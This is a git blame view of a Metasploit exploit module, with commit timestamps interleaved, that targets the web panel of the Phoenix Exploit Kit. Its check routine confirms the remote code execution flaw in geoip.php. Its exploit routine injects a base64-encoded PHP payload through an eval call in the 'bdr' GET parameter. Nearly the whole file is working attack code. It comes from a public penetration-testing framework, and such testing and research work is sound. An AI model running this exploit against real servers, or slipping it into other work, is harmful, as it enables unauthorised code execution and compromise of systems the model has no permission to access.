Files
metasploit-gs/modules/exploits/multi/http/phoenix_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

80 lines
2.3 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
2025-06-20 13:20:44 +01:00
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Phoenix Exploit Kit Remote Code Execution',
'Description' => %q{
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The
Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,
silently installing malware if found.
},
'License' => MSF_LICENSE,
'Author' => [
'CrashBandicot', # initial discovery by @DosPerl
'Jay Turla' # msf module by @shipcod3
],
2025-06-20 13:20:44 +01:00
'References' => [
[ 'EDB', '40047' ],
[ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
2016-08-29 13:28:15 -05:00
[ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
],
2025-06-20 13:20:44 +01:00
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
2016-08-29 14:14:22 -05:00
[ 'Automatic', {} ]
],
2025-06-20 13:20:44 +01:00
'DisclosureDate' => '2016-07-01',
'DefaultTarget' => 0,
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
register_options(
[
2016-08-29 13:28:15 -05:00
OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php'])
2025-06-20 13:20:44 +01:00
]
)
end
def check
test = Rex::Text.rand_text_alpha(8)
2016-08-29 14:14:22 -05:00
res = http_send_command("echo \"#{test}\";")
if res && res.body.include?(test)
2016-08-29 14:13:18 -05:00
return Exploit::CheckCode::Vulnerable
end
2025-06-20 13:20:44 +01:00
2016-08-29 13:28:15 -05:00
Exploit::CheckCode::Safe
end
def exploit
encoded = Rex::Text.encode_base64(payload.encoded)
2016-08-29 14:14:22 -05:00
http_send_command("eval(base64_decode(\"#{encoded}\"));")
end
def http_send_command(cmd)
2016-08-29 13:28:15 -05:00
send_request_cgi(
2025-06-20 13:20:44 +01:00
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'bdr' => cmd
}
2016-08-29 13:28:15 -05:00
)
end
end